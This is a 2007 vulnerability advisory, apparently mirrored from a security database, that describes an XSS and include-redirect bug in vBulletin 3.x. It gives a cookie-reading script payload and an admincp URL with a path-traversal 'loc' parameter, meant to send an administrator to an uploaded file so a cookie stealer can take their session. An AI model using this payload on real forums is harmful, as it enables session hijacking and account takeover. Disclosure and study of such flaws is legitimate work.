Lucene search
SecurityvulnsSECURITYVULNS:DOC:17306HistoryJun 20, 2007 - 12:00 a.m.
New Include Redirect Bug XSS All vBulletin v 3.x.x
2007-06-2000:00:00
vulners.com
17
±-------------------------------------------------------------------
+
- New Include Redirect Bug XSS All vBulletin® v 3.x.x
±-------------------------------------------------------------------
- vendor site…: http://www.vbulletin.com/
- Affected Software .: vbulletin
- Class …: XSS
- Risk …: Low
- Found by …: rUnViRuS
- Original advisory .: http://www.sec-area.com/
- Contact …: stormhacker[at]hotmail[.]com
±-------------------------------------------------------------------
New Include Redirect Bug XSS All vBulletin v 3.x.x
This injections would allow an attacker to Include Redirect Admin to a page of his choice, effectively
Xss the page and steal cookie :
xss permanent ( must be Upload any File on Site Have Xss code ) PoC :
<script>alert(document.cookie)</script>.
to be used with cookie stealer following is a simple attack :-
http://localhost/vb/admincp/index.php?loc=../../../nez.txt
When opened url Will stealing cookies
±-------------------------------------------------------------------
- [W]orld [D]efacers [T]eam
- Greets:
- || rUnViRuS || - || Provide || - || HeX || - || dEv!L RoOT || + || BlackWHITE || - || dOcnok || - || A.tar0uDant.D ||
- || Pro Hacker || - || DARKFIRE || - || papipsycho ||
- Sp.Thanx To : Sec-Area.com Member's
±------------------------[ W D T ]----------------------------------